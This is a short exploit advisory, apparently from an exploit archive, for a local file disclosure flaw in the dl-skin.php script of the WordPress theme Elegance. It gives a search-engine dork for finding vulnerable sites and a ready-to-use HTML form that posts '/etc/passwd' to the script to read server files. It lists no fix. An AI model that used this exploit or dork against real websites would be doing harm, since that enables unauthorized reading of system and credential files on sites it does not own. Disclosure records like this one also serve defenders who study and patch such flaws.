Wordpress Theme Elegance - Post Local File Disclosure

2014-06-08 19:05:03

[+] Post Local File Disclosure in wordpress theme Elegance
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/elegance/"
[+] Vendor Homepage: http://www.elegantthemes.com/
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php

[+] Exploit :

<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>


eof

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.